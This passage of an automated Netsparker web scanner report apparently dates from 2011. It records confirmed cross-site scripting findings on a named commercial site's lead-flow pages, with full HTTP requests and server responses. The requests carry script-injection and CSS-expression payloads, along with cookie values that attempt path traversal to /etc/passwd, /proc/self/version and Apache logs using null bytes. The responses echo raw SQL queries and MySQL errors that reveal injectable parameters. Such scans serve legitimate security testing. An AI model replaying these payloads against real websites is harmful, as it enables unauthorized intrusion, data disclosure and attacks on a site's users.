OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=43f3p921lbu0lt09k7m11q6h40; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='"--></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005BC)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
catId GET 30008
iusrc GET '"--></style></script><script>alert(0x0005BD)</script>

Request

GET /ppc/leadflow/meac00/project.php?catId=30008&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005BD)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=h850kqs1fbj9m8e8c866ltskl0; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?catId=30008&iusrc='"--></style></script><script>netsparker(0x0005BD)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005BD)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005BB)%3C/script%3E

/ppc/leadflow/inco00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005BB)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0005BB)</script>

Request

GET /ppc/leadflow/inco00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005BB)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=vnt298qjd8b5jjoo74ilifspo7; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>' OR prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>' OR prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>' OR prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>' OR prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>' OR prj.project_page_url = 'leadflow/inco00/'"--></style></script><script>netsparker(0x0005BB)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005BB)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 60003
iusrc GET iupsc
